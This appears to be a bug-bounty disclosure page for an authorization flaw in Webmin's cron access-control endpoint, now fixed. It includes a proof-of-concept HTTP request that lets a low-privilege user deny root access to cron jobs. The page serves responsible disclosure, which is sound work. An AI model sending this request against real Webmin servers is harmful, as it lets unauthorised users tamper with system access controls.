Improper Authorization in webmin/webmin

Valid

Reported on

Feb 17th 2022

Description

The /cron/save_allow.cgi endpoint is accessible to any authenticated low privilege users resulting in controlling user access to cron jobs. They could allow and deny other users access to cron jobs affecting the Scheduled Cron Jobs module.

Proof of Concept

Affected Endpoint:

GET http://{HOST}/cron/save_allow.cgi

Request

*** This example request to deny root to access cron.

GET /cron/save_allow.cgi?allow=&mode=2&deny=root HTTP/1.1
Host: jumphost:10000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-no-links: 1
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: save_allow.cgi
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Referer: http://jumphost:10000/cron/edit_allow.cgi?xnavigation=1
Cookie: redirect=1; testing=1; sid=092a4f34132757770ba9c9c353760197

Impact

This vulnerability is capable of modifying or restricting access to a system function outside the user's limits.

Occurrences

save_allow.cgi L5-L17

We are processing your report and will contact the webmin team within 24 hours. a year ago

We have contacted a member of the webmin team and are waiting to hear back a year ago

webmin validated this vulnerability a year ago

Faisal Fs ⚔️ has been awarded the disclosure bounty

The fix bounty is now up for grabs

webmin marked this as fixed in 1.990 with commit eeeea3 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

save_allow.cgi#L5-L17 has been validated

to join this conversation